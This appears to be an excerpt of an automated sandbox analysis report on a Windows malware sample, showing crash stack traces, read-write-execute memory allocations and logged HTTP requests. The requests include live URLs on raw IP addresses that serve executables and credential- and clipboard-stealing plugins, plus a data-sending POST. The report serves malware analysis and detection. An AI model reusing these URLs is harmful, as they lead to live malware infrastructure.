__exception__ Jan. 23, 2024, 7:55 a.m.	stacktrace: RtlpNtEnumerateSubKey+0x2a2b isupper-0x4e2b ntdll+0xcf559 @ 0x7796f559 RtlpNtEnumerateSubKey+0x2b0b isupper-0x4d4b ntdll+0xcf639 @ 0x7796f639 RtlUlonglongByteSwap+0xba5 RtlFreeOemString-0x20d35 ntdll+0x7df95 @ 0x7791df95 HeapFree+0x14 GetProcessHeap-0xc kernel32+0x114dd @ 0x757f14dd face+0xf374f @ 0x14c374f face+0xea16e @ 0x14ba16e face+0xdbe9c @ 0x14abe9c face+0x10a142 @ 0x14da142 face+0xeeb23 @ 0x14beb23 face+0xeedd7 @ 0x14bedd7 face+0xeb99a @ 0x14bb99a face+0xeb8c6 @ 0x14bb8c6 face+0xeba88 @ 0x14bba88 face+0xebbef @ 0x14bbbef face+0xdc222 @ 0x14ac222 face+0x29a7c7 @ 0x166a7c7 0x3bfe88 exception.instruction_r: eb 12 8b 45 ec 8b 08 8b 09 50 51 e8 6f ff ff ff exception.symbol: RtlpNtEnumerateSubKey+0x1b25 isupper-0x5d31 ntdll+0xce653 exception.instruction: jmp 0x7796e667 exception.module: ntdll.dll exception.exception_code: 0xc0000374 exception.offset: 845395 exception.address: 0x7796e653 registers.esp: 3930848 registers.edi: 8044640 registers.eax: 3930864 registers.ebp: 3930968 registers.edx: 0 registers.ebx: 0 registers.esi: 7864320 registers.ecx: 2147483647	1
__exception__ Jan. 23, 2024, 7:56 a.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x75b94387 NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x754bef51 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x754b6b42 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x754d5c3a NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x755506b8 WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x75c6d7e6 WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x75c6d876 WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x75c6ddd0 CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x75b88a43 CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x75b88938 DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x75b8950a WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x75c6dccd WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x75c6db41 WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x75c6e1fd DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x75b89367 DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x75b89326 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755f62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755f77c4 DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x755f788a CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x75b4a48b CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x75b4853b CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x75b4a4ac CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x75b5cd48 CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x75b5d87a BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 103673428 registers.edi: 79945484 registers.eax: 103673428 registers.ebp: 103673508 registers.edx: 4164878962 registers.ebx: 103673792 registers.esi: 2147746133 registers.ecx: 79678152	1
__exception__ Jan. 23, 2024, 7:56 a.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x75c6f725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x754d414b ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x75b3fe14 StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x75c6a338 IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x7532e99f IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x753072ed RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x752fab0d GetIUriPriv2+0x603 CoInternetIsFeatureEnabledForIUri-0xdf6 urlmon+0x1ea98 @ 0x752fea98 RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x752f87f7 CopyStgMedium+0x286 FindMediaType-0x70d urlmon+0x1ba32 @ 0x752fba32 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755f62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755f77c4 DispatchMessageA+0xf GetMessageA-0x9 user32+0x17bca @ 0x755f7bca CreateAsyncBindCtx+0xb2f URLDownloadToCacheFileW-0x54c urlmon+0x4516f @ 0x7532516f CreateAsyncBindCtx+0xa8e URLDownloadToCacheFileW-0x5ed urlmon+0x450ce @ 0x753250ce RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x752fa0d8 RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x752f9b85 RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x752f9aa8 CreateAsyncBindCtx+0xccc URLDownloadToCacheFileW-0x3af urlmon+0x4530c @ 0x7532530c URLDownloadToCacheFileW+0xe5 CoInternetIsFeatureZoneElevationEnabled-0x2c18 urlmon+0x457a0 @ 0x753257a0 DllCanUnloadNow+0xcfc8 IEAssociateThreadWithTab-0x294dd ieframe+0x2540c @ 0x729b540c DllCanUnloadNow+0xce86 IEAssociateThreadWithTab-0x2961f ieframe+0x252ca @ 0x729b52ca CreateExtensionGuidEnumerator+0x5d622 SetQueryNetSessionCount-0x15f9a ieframe+0x100ea3 @ 0x72a90ea3 RtlGetUserInfoHeap+0x225 RtlQueueWorkItem-0x210 ntdll+0x67e96 @ 0x77907e96 TpCallbackIndependent+0x527 RtlIsCriticalSectionLockedByThread-0x240 ntdll+0x454f4 @ 0x778e54f4 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 71818224 registers.edi: 1974991376 registers.eax: 71818224 registers.ebp: 71818304 registers.edx: 1 registers.ebx: 5460556 registers.esi: 2147746133 registers.ecx: 2082696782	1
__exception__ Jan. 23, 2024, 7:55 a.m.	stacktrace: n6p8x5rop5bchcdpw23f+0x1bcb9e @ 0xadcb9e n6p8x5rop5bchcdpw23f+0x1498dc @ 0xa698dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: n6p8x5rop5bchcdpw23f+0x126204 exception.instruction: ud2 exception.module: n6P8X5rop5bCHCDpw23f.exe exception.exception_code: 0xc000001d exception.offset: 1204740 exception.address: 0xa46204 registers.esp: 2489052 registers.edi: 11362444 registers.eax: 0 registers.ebp: 2489080 registers.edx: 2 registers.ebx: 40579916 registers.esi: 5 registers.ecx: 40579916	1
__exception__ Jan. 23, 2024, 7:55 a.m.	stacktrace: n6p8x5rop5bchcdpw23f+0x1bcb9e @ 0xadcb9e n6p8x5rop5bchcdpw23f+0x1498dc @ 0xa698dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: n6p8x5rop5bchcdpw23f+0x1261d9 exception.instruction: div eax exception.module: n6P8X5rop5bCHCDpw23f.exe exception.exception_code: 0xc0000094 exception.offset: 1204697 exception.address: 0xa461d9 registers.esp: 2489052 registers.edi: 2489052 registers.eax: 0 registers.ebp: 2489080 registers.edx: 0 registers.ebx: 10773018 registers.esi: 0 registers.ecx: 2489260	1
__exception__ Jan. 23, 2024, 7:55 a.m.	stacktrace: n6p8x5rop5bchcdpw23f+0x1bcb9e @ 0xadcb9e n6p8x5rop5bchcdpw23f+0x1498dc @ 0xa698dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: n6p8x5rop5bchcdpw23f+0x1261d9 exception.instruction: div eax exception.module: n6P8X5rop5bCHCDpw23f.exe exception.exception_code: 0xc0000094 exception.offset: 1204697 exception.address: 0xa461d9 registers.esp: 2489052 registers.edi: 2489052 registers.eax: 0 registers.ebp: 2489080 registers.edx: 0 registers.ebx: 10772975 registers.esi: 0 registers.ecx: 2489260	1
__exception__ Jan. 23, 2024, 7:55 a.m.	stacktrace: n6p8x5rop5bchcdpw23f+0x1bcb9e @ 0xadcb9e n6p8x5rop5bchcdpw23f+0x1498dc @ 0xa698dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: n6p8x5rop5bchcdpw23f+0x126204 exception.instruction: ud2 exception.module: n6P8X5rop5bCHCDpw23f.exe exception.exception_code: 0xc000001d exception.offset: 1204740 exception.address: 0xa46204 registers.esp: 2489052 registers.edi: 2489052 registers.eax: 0 registers.ebp: 2489080 registers.edx: 2 registers.ebx: 10772975 registers.esi: 0 registers.ecx: 2489260	1
__exception__ Jan. 23, 2024, 7:55 a.m.	stacktrace: n6p8x5rop5bchcdpw23f+0x1bcb9e @ 0xadcb9e n6p8x5rop5bchcdpw23f+0x1498dc @ 0xa698dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: n6p8x5rop5bchcdpw23f+0x1261d9 exception.instruction: div eax exception.module: n6P8X5rop5bCHCDpw23f.exe exception.exception_code: 0xc0000094 exception.offset: 1204697 exception.address: 0xa461d9 registers.esp: 2489052 registers.edi: 2489052 registers.eax: 0 registers.ebp: 2489080 registers.edx: 0 registers.ebx: 10773018 registers.esi: 0 registers.ecx: 2489260	1
__exception__ Jan. 23, 2024, 7:55 a.m.	stacktrace: n6p8x5rop5bchcdpw23f+0x1bcb9e @ 0xadcb9e n6p8x5rop5bchcdpw23f+0x1498dc @ 0xa698dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: n6p8x5rop5bchcdpw23f+0x126204 exception.instruction: ud2 exception.module: n6P8X5rop5bCHCDpw23f.exe exception.exception_code: 0xc000001d exception.offset: 1204740 exception.address: 0xa46204 registers.esp: 2489052 registers.edi: 2489052 registers.eax: 0 registers.ebp: 2489080 registers.edx: 2 registers.ebx: 10772975 registers.esi: 0 registers.ecx: 2489260	1
__exception__ Jan. 23, 2024, 7:55 a.m.	stacktrace: n6p8x5rop5bchcdpw23f+0x1bfb4a @ 0xadfb4a n6p8x5rop5bchcdpw23f+0x1bddff @ 0xadddff n6p8x5rop5bchcdpw23f+0x1498dc @ 0xa698dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: n6p8x5rop5bchcdpw23f+0x126204 exception.instruction: ud2 exception.module: n6P8X5rop5bCHCDpw23f.exe exception.exception_code: 0xc000001d exception.offset: 1204740 exception.address: 0xa46204 registers.esp: 2489004 registers.edi: 11362444 registers.eax: 0 registers.ebp: 2489032 registers.edx: 2 registers.ebx: 5832704 registers.esi: 10027008 registers.ecx: 10027008	1
__exception__ Jan. 23, 2024, 7:55 a.m.	stacktrace: n6p8x5rop5bchcdpw23f+0x1bfb4a @ 0xadfb4a n6p8x5rop5bchcdpw23f+0x1bddff @ 0xadddff n6p8x5rop5bchcdpw23f+0x1498dc @ 0xa698dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: n6p8x5rop5bchcdpw23f+0x1261d9 exception.instruction: div eax exception.module: n6P8X5rop5bCHCDpw23f.exe exception.exception_code: 0xc0000094 exception.offset: 1204697 exception.address: 0xa461d9 registers.esp: 2489004 registers.edi: 2489004 registers.eax: 0 registers.ebp: 2489032 registers.edx: 0 registers.ebx: 10773018 registers.esi: 0 registers.ecx: 2489040	1
__exception__ Jan. 23, 2024, 7:55 a.m.	stacktrace: n6p8x5rop5bchcdpw23f+0x1bfb4a @ 0xadfb4a n6p8x5rop5bchcdpw23f+0x1bddff @ 0xadddff n6p8x5rop5bchcdpw23f+0x1498dc @ 0xa698dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: n6p8x5rop5bchcdpw23f+0x126204 exception.instruction: ud2 exception.module: n6P8X5rop5bCHCDpw23f.exe exception.exception_code: 0xc000001d exception.offset: 1204740 exception.address: 0xa46204 registers.esp: 2489004 registers.edi: 2489004 registers.eax: 0 registers.ebp: 2489032 registers.edx: 2 registers.ebx: 10772975 registers.esi: 0 registers.ecx: 2489040	1
__exception__ Jan. 23, 2024, 7:55 a.m.	stacktrace: n6p8x5rop5bchcdpw23f+0x1bfcf8 @ 0xadfcf8 n6p8x5rop5bchcdpw23f+0x1bddff @ 0xadddff n6p8x5rop5bchcdpw23f+0x1498dc @ 0xa698dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: n6p8x5rop5bchcdpw23f+0x126204 exception.instruction: ud2 exception.module: n6P8X5rop5bCHCDpw23f.exe exception.exception_code: 0xc000001d exception.offset: 1204740 exception.address: 0xa46204 registers.esp: 2489004 registers.edi: 11362444 registers.eax: 0 registers.ebp: 2489032 registers.edx: 2 registers.ebx: 5832704 registers.esi: 10027008 registers.ecx: 2489032	1
__exception__ Jan. 23, 2024, 7:55 a.m.	stacktrace: n6p8x5rop5bchcdpw23f+0x1bfcf8 @ 0xadfcf8 n6p8x5rop5bchcdpw23f+0x1bddff @ 0xadddff n6p8x5rop5bchcdpw23f+0x1498dc @ 0xa698dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: n6p8x5rop5bchcdpw23f+0x1261d9 exception.instruction: div eax exception.module: n6P8X5rop5bCHCDpw23f.exe exception.exception_code: 0xc0000094 exception.offset: 1204697 exception.address: 0xa461d9 registers.esp: 2489004 registers.edi: 2489004 registers.eax: 0 registers.ebp: 2489032 registers.edx: 0 registers.ebx: 10773018 registers.esi: 0 registers.ecx: 2489040	1
__exception__ Jan. 23, 2024, 7:55 a.m.	stacktrace: n6p8x5rop5bchcdpw23f+0x1bfcf8 @ 0xadfcf8 n6p8x5rop5bchcdpw23f+0x1bddff @ 0xadddff n6p8x5rop5bchcdpw23f+0x1498dc @ 0xa698dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: n6p8x5rop5bchcdpw23f+0x1261d9 exception.instruction: div eax exception.module: n6P8X5rop5bCHCDpw23f.exe exception.exception_code: 0xc0000094 exception.offset: 1204697 exception.address: 0xa461d9 registers.esp: 2489004 registers.edi: 2489004 registers.eax: 0 registers.ebp: 2489032 registers.edx: 0 registers.ebx: 10772975 registers.esi: 0 registers.ecx: 2489040	1
__exception__ Jan. 23, 2024, 7:55 a.m.	stacktrace: n6p8x5rop5bchcdpw23f+0x1bfdf2 @ 0xadfdf2 n6p8x5rop5bchcdpw23f+0x1bddff @ 0xadddff n6p8x5rop5bchcdpw23f+0x1498dc @ 0xa698dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: n6p8x5rop5bchcdpw23f+0x126204 exception.instruction: ud2 exception.module: n6P8X5rop5bCHCDpw23f.exe exception.exception_code: 0xc000001d exception.offset: 1204740 exception.address: 0xa46204 registers.esp: 2489004 registers.edi: 11362444 registers.eax: 0 registers.ebp: 2489032 registers.edx: 2 registers.ebx: 5832704 registers.esi: 10027008 registers.ecx: 3081205410	1
__exception__ Jan. 23, 2024, 7:55 a.m.	stacktrace: n6p8x5rop5bchcdpw23f+0x1bfdf2 @ 0xadfdf2 n6p8x5rop5bchcdpw23f+0x1bddff @ 0xadddff n6p8x5rop5bchcdpw23f+0x1498dc @ 0xa698dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: n6p8x5rop5bchcdpw23f+0x126204 exception.instruction: ud2 exception.module: n6P8X5rop5bCHCDpw23f.exe exception.exception_code: 0xc000001d exception.offset: 1204740 exception.address: 0xa46204 registers.esp: 2489004 registers.edi: 2489004 registers.eax: 0 registers.ebp: 2489032 registers.edx: 2 registers.ebx: 10773018 registers.esi: 0 registers.ecx: 2489040	1
__exception__ Jan. 23, 2024, 7:55 a.m.	stacktrace: n6p8x5rop5bchcdpw23f+0x1bfe88 @ 0xadfe88 n6p8x5rop5bchcdpw23f+0x1bddff @ 0xadddff n6p8x5rop5bchcdpw23f+0x1498dc @ 0xa698dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: n6p8x5rop5bchcdpw23f+0x1261d9 exception.instruction: div eax exception.module: n6P8X5rop5bCHCDpw23f.exe exception.exception_code: 0xc0000094 exception.offset: 1204697 exception.address: 0xa461d9 registers.esp: 2489004 registers.edi: 11362444 registers.eax: 0 registers.ebp: 2489032 registers.edx: 0 registers.ebx: 5832704 registers.esi: 10027008 registers.ecx: 1595858424	1
__exception__ Jan. 23, 2024, 7:55 a.m.	stacktrace: n6p8x5rop5bchcdpw23f+0x1bfe88 @ 0xadfe88 n6p8x5rop5bchcdpw23f+0x1bddff @ 0xadddff n6p8x5rop5bchcdpw23f+0x1498dc @ 0xa698dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: n6p8x5rop5bchcdpw23f+0x1261d9 exception.instruction: div eax exception.module: n6P8X5rop5bCHCDpw23f.exe exception.exception_code: 0xc0000094 exception.offset: 1204697 exception.address: 0xa461d9 registers.esp: 2489004 registers.edi: 2489004 registers.eax: 0 registers.ebp: 2489032 registers.edx: 0 registers.ebx: 10772975 registers.esi: 0 registers.ecx: 2489040	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (17 events)

suspicious_features	Connection to IP address	suspicious_request	HEAD http://109.107.182.3/cost/go.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://109.107.182.3/cost/go.exe
suspicious_features	Connection to IP address	suspicious_request	HEAD http://185.215.113.68/mine/amer.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://185.215.113.68/mine/amer.exe
suspicious_features	Connection to IP address	suspicious_request	HEAD http://109.107.182.3/cost/nika.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://109.107.182.3/cost/nika.exe
suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address	suspicious_request	POST http://185.215.113.68/theme/index.php
suspicious_features	Connection to IP address	suspicious_request	HEAD http://109.107.182.3/cost/vimu.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://109.107.182.3/cost/vimu.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.172.128.19/latestrocki.exe
suspicious_features	Connection to IP address	suspicious_request	HEAD http://109.107.182.3/cost/networ.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://109.107.182.3/cost/networ.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://87.251.77.166/SetupPowerGREPDemo.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.215.113.68/theme/Plugins/cred64.dll
suspicious_features	Connection to IP address	suspicious_request	GET http://185.172.128.90/cpa/ping.php?substr=seven&s=ab
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.215.113.68/theme/Plugins/clip64.dll
suspicious_features	Connection to IP address	suspicious_request	GET http://185.172.128.109/syncUpd.exe

Performs some HTTP requests (29 events)

request	HEAD http://109.107.182.3/cost/go.exe
request	GET http://109.107.182.3/cost/go.exe
request	HEAD http://185.215.113.68/mine/amer.exe
request	GET http://185.215.113.68/mine/amer.exe
request	HEAD http://109.107.182.3/cost/nika.exe
request	GET http://109.107.182.3/cost/nika.exe
request	POST http://185.215.113.68/theme/index.php
request	HEAD http://109.107.182.3/cost/vimu.exe
request	GET http://109.107.182.3/cost/vimu.exe
request	GET http://185.172.128.19/latestrocki.exe
request	HEAD http://109.107.182.3/cost/networ.exe
request	GET http://109.107.182.3/cost/networ.exe
request	GET http://87.251.77.166/SetupPowerGREPDemo.exe
request	GET http://185.215.113.68/theme/Plugins/cred64.dll
request	GET http://185.172.128.90/cpa/ping.php?substr=seven&s=ab
request	GET http://185.215.113.68/theme/Plugins/clip64.dll
request	GET http://apps.identrust.com/roots/dstrootcax3.p7c
request	GET http://185.172.128.109/syncUpd.exe
request	GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml
request	GET https://db-ip.com/demo/home.php?s=175.208.134.152
request	GET https://accounts.google.com/
request	GET https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F
request	GET https://accounts.google.com/InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=ASKXGp0prvDtaojbUs_fFiN9b9CD7hkEJ1nHDhTfd9vIUqM3YxyI4uMpGixUZhaFGRKzHsJvSPCU
request	GET https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=ASKXGp19ppAsRv2o6lyozUloXtl2vtHTQ_Z5hQtp6-dWz_Yb_d5Sog8ygYecStquNLy1xgWdXfMz&passive=1209600&flowName=WebLiteSignIn&flowEntry=ServiceLogin&dsh=S-955853393%3A1705964159222861
request	GET https://accounts.google.com/_/bscframe
request	GET https://ssl.gstatic.com/images/branding/googlelogo/2x/googlelogo_color_74x24dp.png
request	GET https://accounts.google.com/favicon.ico
request	GET https://www.google.com/favicon.ico
request	GET https://accounts.google.com/generate_204?dNjB8g

Sends data using the HTTP POST Method (1 event)

request

POST http://185.215.113.68/theme/index.php

Allocates read-write-execute memory (usually to unpack itself) (50 out of 598 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Jan. 23, 2024, 7:55 a.m.	process_identifier: 1792 region_size: 2936832 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 23, 2024, 7:55 a.m.	process_identifier: 1792 region_size: 16384 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ef0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 23, 2024, 7:55 a.m.	process_identifier: 1792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00770000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 23, 2024, 7:55 a.m.	process_identifier: 1792 region_size: 81920 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ef4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 23, 2024, 7:55 a.m.	process_identifier: 1792 region_size: 147456 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ef4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 23, 2024, 7:55 a.m.	process_identifier: 1792 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00f14000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 23, 2024, 7:55 a.m.	process_identifier: 1792 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00f24000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 23, 2024, 7:55 a.m.	process_identifier: 1792 region_size: 81920 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00f24000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 23, 2024, 7:55 a.m.	process_identifier: 1792 region_size: 16384 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00f34000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 23, 2024, 7:55 a.m.	process_identifier: 1792 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00f38000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 23, 2024, 7:55 a.m.	process_identifier: 1792 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00f38000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 23, 2024, 7:55 a.m.	process_identifier: 1792 region_size: 475136 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00f38000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 23, 2024, 7:55 a.m.	process_identifier: 1792 region_size: 81920 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00f38000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 23, 2024, 7:55 a.m.	process_identifier: 1792 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00f38000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
